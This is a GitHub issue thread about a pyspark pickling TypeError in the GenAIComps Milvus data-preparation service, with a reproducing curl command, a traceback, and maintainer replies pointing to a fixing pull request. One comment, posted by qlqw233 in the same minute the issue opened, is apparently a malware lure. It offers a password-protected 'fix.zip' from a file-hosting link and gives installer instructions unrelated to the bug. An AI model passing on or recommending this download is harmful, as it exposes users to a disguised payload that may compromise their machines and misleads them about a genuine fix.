### ISSUE TITLE
TypeError with file upload of Milvus data preparation

### ISSUE THREAD

**Issue by CharleneHu-42** [opea-project/GenAIComps#562] opened 2024-08-26 08:25 UTC
When invoking milvus dataprep microservice with file upload request:

```bash
curl -X POST \
    -H "Content-Type: multipart/form-data" \
    -F "files=@./file.pdf" \
    http://localhost:6010/v1/dataprep
```

The following error occurs in [`rdd_trans.collect()`](https://github.com/opea-project/GenAIComps/blob/9b8798a3eb2ed96a71681be018d48fc1392bf274/comps/dataprep/milvus/prepare_doc_milvus.py#L242) of `prepare_doc_milvus.py`

```
Traceback (most recent call last):

 File "/home/user/.local/lib/python3.11/site-packages/pyspark/serializers.py", line 459, in dumps

   return cloudpickle.dumps(obj, pickle_protocol)

         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

 File "/home/user/.local/lib/python3.11/site-packages/pyspark/cloudpickle/cloudpickle_fast.py", line 73, in dumps

   cp.dump(obj)

 File "/home/user/.local/lib/python3.11/site-packages/pyspark/cloudpickle/cloudpickle_fast.py", line 632, in dump

   return Pickler.dump(self, obj)

         ^^^^^^^^^^^^^^^^^^^^^^^

TypeError: cannot pickle '_thread.RLock' object
```

**Comment by qlqw233** [comment] 2024-08-26 08:25
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by letonghan** [comment] 2024-08-27 07:59
Hi @CharleneHu-42 , this is caused by pyspark. Discussed with @XinyuYe-Intel , this part of code will be removed in the coming PR. Will paste the PR link here later.

**Comment by letonghan** [comment] 2024-09-03 02:11
Fixed by PR https://github.com/opea-project/GenAIComps/pull/570. Will close this issue.

**Closed by letonghan** 2024-09-03 02:11 UTC
Labels: DEV
